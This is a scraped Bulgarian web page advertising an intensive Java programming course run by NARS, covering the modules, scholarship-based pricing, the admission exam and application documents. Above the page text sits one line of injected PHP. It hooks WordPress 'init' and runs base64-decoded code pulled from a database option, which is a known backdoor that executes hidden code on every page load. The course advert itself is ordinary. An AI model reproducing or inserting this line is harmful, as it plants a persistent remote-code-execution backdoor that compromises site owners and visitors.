add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); Обучение и Работа - НАРС

Професия Програмист – професионално обучение и работа

Интензивно професионално Java обучение

НАРС обявява прием за студенти по специалността “Програмно осигуряване” – направление Java.

Кандидатите, които се класират на челните места, ще получат пълна или частична стипендия, осигурена от водещи софтуерни компании в страната и чужбина.

Обучението се провежда по одобрена програма от Министерство на Образованието и Науката и успешното му завършване гарантира “Свидетелство за професионална квалификация”, издадено от МОН.

Курсът е разработен по световно утвърдени стандарти на водещи университети и центрове за професионално обучение. Той е с продължителност 8 месеца и включва множество практически упражнения. В края на обучението студентите ще имат възможност за стаж в софтуерна компания в България или чужбина, както и да продължат обучението си в университети-партньори на НАРС.

Обучението не замества университетското образование – то е начин за надграждане на знанията в по-тясна специализирана област и придобиване на практически опит, взаимстван от практиката на софтуерните компании.

За студенти в Компютърни и ИТ специалности се признават положените от тях изпити по съответните модули от Университета.
За кандидати, които нямат висше образование в областта на ИТ, или не са в процес на придобиване на такова, обучението предлага възможност да започнат от начално ниво и да усвоят нужната теория и практика.

Възможностите за посещение на лекциите са в различни варианти: вечерно, дневно, съботно-неделно или в дистанционна (онлайн) форма.

 

Програма на обучението:

Обучението е с продължителност 480 часа, като програмата е съобразена с изискванията на софтуерните фирми.

За курса:

Java дава възможност на софтуерните разработчици да създават приложения, които да работят лесно и стабилно на различни платформи. В този курс се придобиват знания и умения с JavaSE, JavaEE и Swing. Ще се научите да създавате богати графични приложения, да съхранявате и извличате данни от файлове, да работите с Java колекции и да създавате Applet-и. Ще се запознаете с клиент/сървър приложения, бази данни, JSF, JSP, Servlets и Web Services.

Ще надградите своя английски и ще се научите как да водите кореспонденция със своите клиенти и партньори. Ще развиете умения за изработване на спецификации, документация и проекти. Ще познавате устройството и работатата на компютъра, ще придобиете опит в областта на операционните системи, мрежи и интернет. Ще се научите как да напишете професионално CV, как да се подготвите и държите на интервю за работа.

Курсът включва следните модули:

Модули
Java SE – основи Основи на програмирането и алгоритми
Структура и синтаксис на Java
Контролни структури и масиви
Java SE Класове и обекти
Обектно-ориентирано програмиране
Работа със стрингове и XML
Generic колекции и методи
Създаване на графичен потребителски интерфейс
Нишки и мрежи
Работа с файлове и сериализация
Бази данни и SQL
Java EE Servlets
JSP
EL
JSF
Web Servises – SOAP
Web Servises – REST
Бизнес ориентирани Английски език и кореспонденция
Изготвяне на спецификации, документация и проекти
Трудово право
Здравословни и безопасни условия на труд
Софт скилс Подготовка за интервю за работа
Как да напишем CV
Устройство и работа на компютрите Компютърна техника
Операционни системи
Компютърни мрежи и интернет

 

Цел на обучението:

Успешното завършване на курса дава възможност за започване на работа като младши програмист в направление Java (Junior Java Developer) във фирма-партньор на НАРС.

Курсистите ще могат да разработват приложения, които работят с бази данни, GUI (потребителски интерфейс), JSF, JSP, Servlets, Web Services, Networking, Multithreading. Множеството практически упражнения и финални проекти обхващат широка гама от техники и технологии – от малки стационарни Swing базирани програми, през клиент-сървър приложения с бази данни, до големи бизнес ориентирани уеб системи за корпоративни клиенти, т.нар enterprise applications.

 

Защо това обучение е подходящо за мен?

* не се изисква предварителен опит

* възможност за пълна или частична стипендия

* преподавателите са доказани професионалисти

* възможност за стаж и работа в софтуерна компания в България или чужбина

* възможност за продължаване на обучението в университети-партньори на НАРС

* получавам “Удостоверение за професионално обучение” от Министерство на Образованието и Науката на всеки етап

* “Свидетелство за професионална квалификация” от МОН след приключване на обучението

* сертификати на български и английски език от НАРС за успешно преминато обучение

 

Внимание Цена на обучението и стипендии:

Регулярната цена на “Интензивно професионално Java обучение” е 2480 лева.

Всички кандидати, които преминат събеседване и положат приемен изпит, имат възможност да получат пълна или частична стипендия, осигурена от водещи софтуерни компании, дългогодишни партньори на НАРС. Размерът на стипендията е процент от цената на курса и е пропорционален на точките от входните тестове и интервюто.

Пример: при оценка от 82 точки отстъпката е 82% от таксата. 82% от 2480лв е 2033 лева отстъпка и се заплащат само 447 лева.

Регулярна цена Цена със стипендия Изчисление
2480 лв. 447 лв. 2480 – (82 * 2480)/100 = 447

 

Приемният изпит е на стойност 20 лева. За студенти и безработни цената на изпита е 10 лева.

Примен изпит и класиране

Кандидатите преминават събеседване със специалист от НАРС и полагат приемен изпит (набор от тестове).

Критерии и срокове за кандидатстване:

Кандидатите трябва да отговарят на следните изисквания:

  • да имат завършено средно образование
  • да притежават развити умения за работа с компютър
  • предимство е да владеят английски език
  • да са мотивирани да се обучават и работят като програмисти

Предварителен опит по програмиране не е необходим. Обучението е подходящо за начинаещи.

Срокът за кандидатстване е до 20-ти септември 2014г.

Първите групи ще стартират през октомври 2014.

Необходими документи:

  1. Диплома за завършено образование – оригинал и ксерокопие (оригиналът се връща след заверка на копието). Кандидат-студентите, завършили образованието си в чужбина, представят диплома, легализирана от МОН.
  2. Документ за самоличност – оригинал и ксерокопие (оригиналът се връща след заверка на копието).
  3. Документ от ТЕЛК или НЕЛК – за кандидат-студенти в неравностойно положение – оригинал и ксерокопие (оригиналът се връща след заверка на копието).

За желаещите да получат повече информация има възможност за безплатна консултация в офиса на НАРС с предварително записване по e-mail: courses@nars.bg и/или телефон 02/9583106.

 

Защо НАРС?

* професионалисти с дългогодишен опит в обучаването и преквалификацията на софтуерни разработчици

* качествено обучение с много примери от практиката

* компютърна техника, на която да се обучава всеки курсист

* досег до редица водещи софтуерни компании-партньори на НАРС, при които може да се започне работа

Желаещите да се запишат и обучават в курса е необходимо да се свържат с нас на: 02/958 31 06 или да ни пишат на courses@nars.bg .

Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad